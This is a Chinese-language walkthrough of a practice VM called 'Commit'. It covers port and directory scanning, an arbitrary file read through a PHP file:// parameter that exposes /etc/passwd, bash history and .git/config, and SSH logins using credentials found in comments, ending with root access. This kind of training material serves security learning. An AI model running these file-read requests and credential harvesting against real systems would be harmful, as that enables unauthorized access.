Commit靶机复盘

一.信息收集

1.1端口扫描：

┌──(root㉿kali)-[~]
└─# nmap -sV -sS -A -p- 192.168.215.111
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-20 03:44 EDT
Nmap scan report for 192.168.215.111
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: DevSecOps Platform v3.0
2222/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
MAC Address: 08:00:27:34:3B:D1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 192.168.215.111

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.10 seconds	

扫描到了web服务和ssh服务，但是ssh的端口号不是22端口，而是2222端口！！！

1.2 目录扫描：

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.215.111/ -t 50 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.215.111/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 280]
/login.php            (Status: 200) [Size: 1661]
/uploads              (Status: 301) [Size: 320] [--> http://192.168.215.111/uploads/]
/index.html           (Status: 200) [Size: 2909]
/.php                 (Status: 403) [Size: 280]
/dashboard.php        (Status: 302) [Size: 0] [--> login.php]
/.html                (Status: 403) [Size: 280]
/.php                 (Status: 403) [Size: 280]
/server-status        (Status: 403) [Size: 280]

扫描到了两个目录：
http://192.168.215.111/uploads/ 和 http://192.168.215.111/login.php

二.漏洞探测与利用：

2.1 获取shell

curl 192.168.215.111

<body>
    <h1 style="color: #2c3e50;border-bottom: 2px solid #3498db;">DevSecOps Integrated Platform</h1>

    <!-- Infrastructure Monitoring - Maintained by xiaoyuega -->
    <div class="system-module">
        <div class="module-tag">v2.1.3</div>
        <h3>Real-time Cluster Monitoring</h3>
        <p>Kubernetes/Docker container performance tracking</p>
    </div>

    <!-- Threat Detection - Maintained by 染风 -->
    <div class="system-module">
        <div class="module-tag">v1.4.7</div>
        <h3>Anomaly Detection System</h3>
        <p>Network traffic pattern analysis module</p>
    </div>

    <!-- CI/CD Pipeline - Maintained by 凌动 -->
    <div class="system-module">
        <div class="module-tag">v3.0.0</div>
        <h3>Automated Deployment Gateway</h3>
        <p>GitOps workflow controller</p>
    </div>

    <!-- Data Analytics - Maintained by 小舟 -->
    <div class="system-module">
        <div class="module-tag">v4.2.1</div>
        <h3>Log Correlation Engine</h3>
        <p>ElasticSearch/Kibana integration layer</p>
    </div>

    <!-- Security Framework - Maintained by LingMj -->
    <div class="system-module">
        <div class="module-tag">v5.0.2</div>
        <h3>Vulnerability Scanner</h3>
        <p>SAST/DAST integration framework</p>
        <!-- Test Account: lingmj / lingmjnb -->
    </div>

    <!-- 其他用户维护模块 -->
    <div class="system-module">
        <div class="module-tag">v2.0.9</div>
        <h3>API Gateway</h3>
        <p>Maintained by 城南花</p>
    </div>

    <div class="system-module">
        <div class="module-tag">v1.6.0</div>
        <h3>Database Proxy</h3>
        <p>Maintained by zhangb</p>
    </div>

    <div class="system-module">
        <div class="module-tag">v3.1.4</div>
        <h3>Cache Manager</h3>
        <p>Maintained by nullpointer</p>
    </div>

    <div class="system-module">
        <div class="module-tag">v0.9.1</div>
        <h3>Notification Service</h3>
        <p>Maintained by xiao</p>
    </div>

    <div class="system-module">
        <div class="module-tag">v4.5.2</div>
        <h3>Load Balancer</h3>
        <p>Maintained by 猪肉</p>
    </div>

    <!-- 更多模块... -->
</body>
</html>

在注释里面发现了lingmj / lingmjnb疑似用户的账号和密码，试了一下ssh 无果，但之前在目录扫描中发现个登录的界面，去尝试一下，可以登录。

是个文件上传（可以上传图片）和ping测试的窗口（可以进行ping），但是都不能绕过，检查源代码

<div class="dashboard-container">
    
    <!-- 用户信息卡 -->
    <div class="card">
        <h2>Welcome, lingmj</h2>
        <a href="?logout" style="color: var(--primary);">Logout</a>
    </div>

    <!-- 
    $file = $_GET['file'] ?? '';
    if (strpos($file, 'file://') === 0) {
        readfile($file);
    }
    -->

是个任意文件读取漏洞（Arbitrary File Read）。攻击者可以通过构造恶意的file参数来读取服务器上的任意文件，包括敏感文件（如配置文件、数据库凭证等）。

进行任意文件读取

http://192.168.215.111/dashboard.php?file=file:///etc/passwd

发现了lingmj用户和welcome用户，在读取一下他们的历史命令文件

http://192.168.215.111/dashboard.php?file=file:///home/lingmj/.bash_history

git init
vi .git/config
<!DOCTYPE html>
<html>

继续查看.git/config文件

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	#lingmj:10839254acf247b9e456d713d673f9ee
<!DOCTYPE html>

发现了密码 lingmj:10839254acf247b9e456d713d673f9ee 使用ssh进行连接

ssh lingmj@192.168.215.111 -p 2222

lingmj@Commit:~$ ls
user.txt
lingmj@Commit:~$ cat user.txt
flag{user-3d442179fc3b320d70689ebb7cb764af}

获取的了user的flag

三.提权

3.1 信息泄露提权

简单试了一下sudo和suid都不能提权。但是之前端口扫描到了ssh服务是2222端口，明显更改过了，去 /etc/ssh/sshd_config 目录查看一下

cat: /etc/ssh/sshd_config/etc/ssh/sshd_config: Not a directory
lingmj@Commit:~$ cat /etc/ssh/sshd_config
#	$OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Include /etc/ssh/sshd_config.d/*.conf

Port 2222
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
# all root login
# modify
#PermitRootLogin yes
PermitRootLogin no

# test admin/pass root/root123.
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

发现了root的账号和密码 root/root123. 得到了falg

四. 补充

可以使用bp进行FUZZ测试：

/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt //目录

根据长度排序，也是可以发现root的账号和密码的

welcome用户在/etc目录里的passwd备份文件中

五. 总结

以后做靶机的注意看配置文件相关的有没有备份，还有历史命令，人往往都会有粗心大意的时候，更何况是任务繁重的管理人员。